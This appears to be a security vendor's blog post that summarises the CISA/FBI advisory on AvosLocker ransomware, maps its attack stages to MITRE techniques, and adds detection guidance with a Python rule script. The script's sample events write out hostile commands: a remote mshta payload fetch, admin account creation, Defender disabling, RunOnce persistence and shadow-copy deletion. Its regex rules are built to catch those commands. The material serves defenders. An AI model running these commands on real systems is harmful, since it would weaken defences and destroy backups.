On October 11, 2023, the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) released a joint Cybersecurity Advisory (CSA) detailing the identification of Indicators of Compromise (IOCs), Tactics, Techniques, and Procedures (TTPs), and detection methods associated with AvosLocker ransomware identified through FBI investigations as recent as May 2023.
This joint CSA is a continuation of CISA’s ongoing #StopRansomware effort to arm defenders with the intelligence they need to combat different ransomware variants and ransomware threat actors.
AvosLocker is a Ransomware-as-a-Service (RaaS) affiliate-based group discovered in July 2021. Affiliates have compromised organizations across multiple critical infrastructure sectors using legitimate software and open-source remote system administration tools.
In late 2021, in line with the growing trend of ransomware operators targeting Linux-based systems and virtualization hosts, AvosLocker introduced a Linux variant capable of targeting VMware ESXi virtual machines (VMs).
AvosLocker employs sophisticated evasion techniques, such as forcing the system to restart in safe mode and disabling specific drivers, to bypass certain security measures that are unable to operate in this mode.
AvosLocker uses exfiltration-based data extortion tactics. After their affiliates infect target systems, AvosLocker manages the publishing and hosting of exfiltrated victim data, in addition to directly handling the ransom negotiation. Additionally, they auction off stolen data on their site, adding another layer to their double extortion scheme.
AttackIQ has released a new attack graph that emulates the observed capabilities of AvosLocker ransomware during a series of activities recorded in May 2022 with the goal of helping customers validate their security controls and their ability to defend against this sophisticated threat.
Validating your security program performance against these behaviors is vital to reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:
- Evaluate security control performance against a threat known for targeting critical infrastructure worldwide.
- Assess their security posture against activities primarily focused on encryption and exfiltration of proprietary information.
- Continuously validate detection and prevention pipelines against behaviors similar to that of many other adversaries focused on ransomware activities.
[CISA AA23-284A] #StopRansomware: AvosLocker Ransomware
In May 2022, Trend Micro reported the discovery of AvosLocker ransomware samples that made use of a legitimate driver to disable security solutions and evade detection. During this investigation, researchers identified that the actors were able to scan for the Log4Shell vulnerability on multiple systems through the use of an Nmap NSE script.
During the analysis, the suspected access vector was identified to be the CVE-2021-40539 vulnerability in Zoho ManageEngine ADSelfService Plus (ADSS). Once this vulnerability was exploited, the adversary utilized the Microsoft HTML Application (MSHTA) utility to remotely execute an HTML Application (HTA) file hosted on the adversary's command-and-control infrastructure.
This attack graph starts immediately after the exploitation of the vulnerability, proceeding with the download and execution of a remote payload using the Microsoft HTML Application (MSHTA) utility. Immediately after the payload is executed, environment reconnaissance is performed. At this stage, the adversary collects information such as basic system details, users and accounts, the system's domain, running processes and installed security software.
System Binary Proxy Execution: Mshta (T1218.010): Mshta.exe is a native Windows utility that adversaries can abuse to download and execute remote payloads.
System Information Discovery (T1082): The native systeminfo command is executed to retrieve Windows system information.
System Owner/User Discovery (T1033): query user and whoami are called to gain details about the currently logged-on accounts.
Account Discovery: Local Account (T1087.001): The native net user command is executed to get a list of local accounts.
Command and Scripting Interpreter: PowerShell (T1059.001): The .NET GetCurrentDomain() method is invoked from PowerShell to retrieve domain information.
Process Discovery (T1057): Windows' built-in tasklist command is executed from a command prompt and the results are saved to a file in a temporary location.
Security Software Discovery (T1518.001): A PowerShell script queries the AntiVirusProduct WMI class to determine which antivirus products are registered on the system.
In the second stage, a new user account is created and added to the local Administrators group. Subsequently, a firewall rule is added to allow inbound TCP traffic for AnyDesk. Next, the adversary installs a driver as a new service named aswSP_ArPot2, the legitimate anti-rootkit driver described in the Trend Micro report that the actors abuse to terminate security products. Finally, the adversary attempts to list security product processes using the PowerShell cmdlet Get-Process.
Create Account: Local Account (T1136.001): Actors create a new account using net user.
Valid Accounts: Local Accounts (T1078.003): This scenario will attempt to add a local user to the local Administrators group using the net localgroup command.
Impair Defenses: Disable or Modify System Firewall (T1562.004): This scenario will create a new rule in the Windows System Firewall to allow inbound TCP traffic to the AnyDesk application.
Create or Modify System Process: Windows Service (T1543.003): Use the native sc command line tool to create a new service that will be executed at reboot.
Process Discovery (T1057): This scenario uses the PowerShell cmdlet Get-Process to discover running processes.
During the third stage, reconnaissance activities are performed on the compromised network. The adversary seeks to gather information concerning the system’s network configuration, enumerate trusted domains and resolve the domain via DNS.
System Network Configuration Discovery (T1016): The network configuration of the asset is collected using standard Windows utilities like ipconfig, arp, route, nltest, and nslookup.
In the fourth stage, the adversary will seek to deploy Mimikatz with the aim of acquiring credentials available on the compromised system. Next, it will seek to target additional systems via Windows Management Instrumentation (WMI) for the purpose of executing remote commands.
Ingress Tool Transfer (T1105): Two separate scenarios deliver the payload, one downloading it only into memory and one saving it to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.
OS Credential Dumping (T1003): This scenario uses Mimikatz to dump passwords and hashes for Windows accounts.
Windows Management Instrumentation (WMI) (T1047): This scenario will attempt to move laterally to any available asset within the network through the use of WMI.
The final stage begins with disabling Windows Defender through a registry policy value to facilitate the deployment of AvosLocker. Once the payload is executed, the adversary will aim to establish persistence using a RunOnce registry key. Finally, AvosLocker will attempt to eliminate system backups by removing Volume Shadow Copies (VSCs) and will initiate the mass encryption of data on the system.
Impair Defenses: Disable or Modify Tools (T1562.001): The registry value HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware is set to 1, which prevents Windows Defender from starting at the next reboot on systems that still honor the value. Note that Microsoft Defender Antivirus on Windows 10 has ignored DisableAntiSpyware since the August 2020 antimalware platform update, so a successful write does not by itself mean protection was disabled; the scenario still exercises whether the write is detected.
Logon Autostart Execution: Registry Run Keys (T1547.001): This scenario writes a value under HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce, a key Windows reads at the next logon to run the listed programs one time (the entry is removed after it runs, unlike the Run key, which executes at every logon).
Inhibit System Recovery (T1490): Runs vssadmin.exe to delete a recent Volume Shadow Copy that the attack graph itself created earlier.
Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using the same encryption algorithm used by AvosLocker ransomware.
Detection and Mitigation Opportunities
Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.
1. Review CISA’s Patching and Detection Recommendations:
CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the attack graph results.
2. Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001):
Preventing an actor from maintaining a foothold in your environment should always be one of the top priorities. During these activities, the adversary used registry keys to achieve persistence.
2a. Detection
Using a Security Information and Event Management (SIEM) or Endpoint Detection and Response (EDR) platform to monitor modifications to the Run and RunOnce keys will alert when unauthorized users or software add entries that cause programs to run at startup or logon. A minimal command-line rule:
Process Name = reg.exe
Command Line CONTAINS ("ADD" AND "\CurrentVersion\Run")
The substring matches both Run and RunOnce. It misses writes made through PowerShell (Set-ItemProperty, New-ItemProperty) or direct registry API calls, so pair it with registry value-set telemetry on the same key paths (Sysmon Event ID 13 or the EDR equivalent).
2b. Mitigation
MITRE ATT&CK does not have any direct mitigations as this is abusing legitimate Windows functionality. They recommend monitoring registry changes and process execution that may attempt to add these keys.
3. Inhibit System Recovery (T1490):
Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.
3a. Detection
Deletion of Volume Shadow Copies usually precedes the encryption routine and can be detected from command-line activity:
Process Name == (cmd.exe OR powershell.exe OR vssadmin.exe)
Command Line CONTAINS ("vssadmin" AND "Delete Shadows")
Affiliates achieve the same result with wmic shadowcopy delete or by removing Win32_ShadowCopy instances through WMI from PowerShell, so the rule should cover those forms as well.
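As an added example, not code from AttackIQ, CISA or the Trend Micro report, the detection logic from 2a and 3a above, together with the stage-2 account-creation sequence, implemented as regex rules over a handful of constructed process-creation events. The hosts, file paths and the 192.0.2.10 address are made up for the example; the rule names, the technique mapping (taken from the scenario list above) and the 600-second correlation window are this example's own assumptions.

```python
"""Rule-based detection over constructed Windows process-creation events.

Added example for this article; not AttackIQ's, CISA's or Trend Micro's code.
Hosts, addresses and paths are constructed, not real telemetry. Rule names and
the correlation window are this example's own choices.
"""
import re
from collections import defaultdict

# Constructed sample events shaped like Windows Security 4688 / Sysmon Event ID 1
# records: host, timestamp (seconds), image path, full command line.
EVENTS = [
    {"host": "ws01", "ts": 10, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://192.0.2.10/index.hta"},
    {"host": "ws01", "ts": 100, "image": r"C:\Windows\System32\net.exe",
     "cmd": "net user backupsvc P@ssw0rd! /add"},
    {"host": "ws01", "ts": 102, "image": r"C:\Windows\System32\net.exe",
     "cmd": "net localgroup Administrators backupsvc /add"},
    {"host": "ws01", "ts": 110, "image": r"C:\Windows\System32\netsh.exe",
     "cmd": 'netsh advfirewall firewall add rule name="AnyDesk" dir=in action=allow protocol=TCP localport=7070'},
    {"host": "ws01", "ts": 115, "image": r"C:\Windows\System32\sc.exe",
     "cmd": r"sc create aswSP_ArPot2 binPath= C:\Temp\asw.sys type= kernel"},
    {"host": "ws01", "ts": 300, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "ws01", "ts": 305, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce /v upd /t REG_SZ /d C:\Temp\avos.exe /f"},
    {"host": "ws01", "ts": 310, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": "vssadmin.exe Delete Shadows /All /Quiet"},
    # Same intent as vssadmin, via binaries a vssadmin-only rule would miss.
    {"host": "ws02", "ts": 400, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": "wmic shadowcopy delete"},
    {"host": "ws02", "ts": 401, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -c "Get-WmiObject Win32_ShadowCopy | Remove-WmiObject"'},
    # Benign: reading the Run key is not persistence and must not fire.
    {"host": "ws03", "ts": 500, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},
]

# (rule name, ATT&CK technique as mapped in the article, case-insensitive regex on the command line)
RULES = [
    ("mshta_remote", "T1218.010", r"\bmshta(\.exe)?\s.*\bhttps?://"),
    ("local_user_add", "T1136.001", r"\bnet1?(\.exe)?\s+user\s+.*\s/add\b"),
    ("local_admin_add", "T1078.003", r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("firewall_allow_inbound", "T1562.004", r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\bdir=in\b.*\baction=allow\b"),
    ("service_create", "T1543.003", r"\bsc(\.exe)?\s+create\b"),
    ("defender_disable_reg", "T1562.001", r"DisableAntiSpyware\b.*/d\s+1\b"),
    # reg.exe and the PowerShell cmdlets; the key substring covers Run and RunOnce.
    ("run_key_persistence", "T1547.001", r"(\breg(\.exe)?\s+add\b|\b(Set|New)-ItemProperty\b).*\\CurrentVersion\\Run(Once)?\b"),
    # vssadmin, wmic and the WMI class removal from PowerShell.
    ("shadow_delete", "T1490", r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|Win32_ShadowCopy\b.*Remove-(WmiObject|CimInstance)"),
]


def match_rules(events, rules=RULES):
    """Apply every rule to every event; return one hit dict per (event, rule) match."""
    compiled = [(name, tid, re.compile(pat, re.IGNORECASE)) for name, tid, pat in rules]
    hits = []
    for ev in events:
        for name, tid, rx in compiled:
            if rx.search(ev["cmd"]):
                hits.append({"host": ev["host"], "ts": ev["ts"], "rule": name,
                             "technique": tid, "cmd": ev["cmd"]})
    return hits


def rules_by_host(hits):
    """Collapse hits to the sorted list of rule names that fired on each host."""
    out = defaultdict(set)
    for h in hits:
        out[h["host"]].add(h["rule"])
    return {host: sorted(names) for host, names in out.items()}


def correlate_new_admin(hits, window=600):
    """Flag hosts where a local account was created and then added to Administrators
    within `window` seconds: the stage-2 sequence, far more specific than either event alone."""
    by_host = defaultdict(list)
    for h in hits:
        by_host[h["host"]].append(h)
    flagged = []
    for host, hs in by_host.items():
        created = [h["ts"] for h in hs if h["rule"] == "local_user_add"]
        promoted = [h["ts"] for h in hs if h["rule"] == "local_admin_add"]
        if any(0 <= p - c <= window for c in created for p in promoted):
            flagged.append(host)
    return sorted(flagged)


if __name__ == "__main__":
    all_hits = match_rules(EVENTS)
    for host, names in sorted(rules_by_host(all_hits).items()):
        print(f"{host}: {', '.join(names)}")
    print("new local admin within window:", correlate_new_admin(all_hits))
```

Run it directly to print which rules fired per host. The shadow_delete rule deliberately covers wmic shadowcopy delete and the Win32_ShadowCopy removal path, and run_key_persistence covers Set-ItemProperty and New-ItemProperty as well as reg.exe, because command-line rules keyed to a single binary are the easiest for an affiliate to sidestep; registry value-set telemetry (Sysmon Event ID 13) remains the more robust source for the persistence case, and the benign reg query on ws03 shows why the rule must require a write, not merely the key path.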
3b. Mitigation
MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery
Wrap-up
In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the activities carried out by the affiliates of this ransomware. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our fully managed service, AttackIQ Ready!, and our co-managed security service, AttackIQ Enterprise.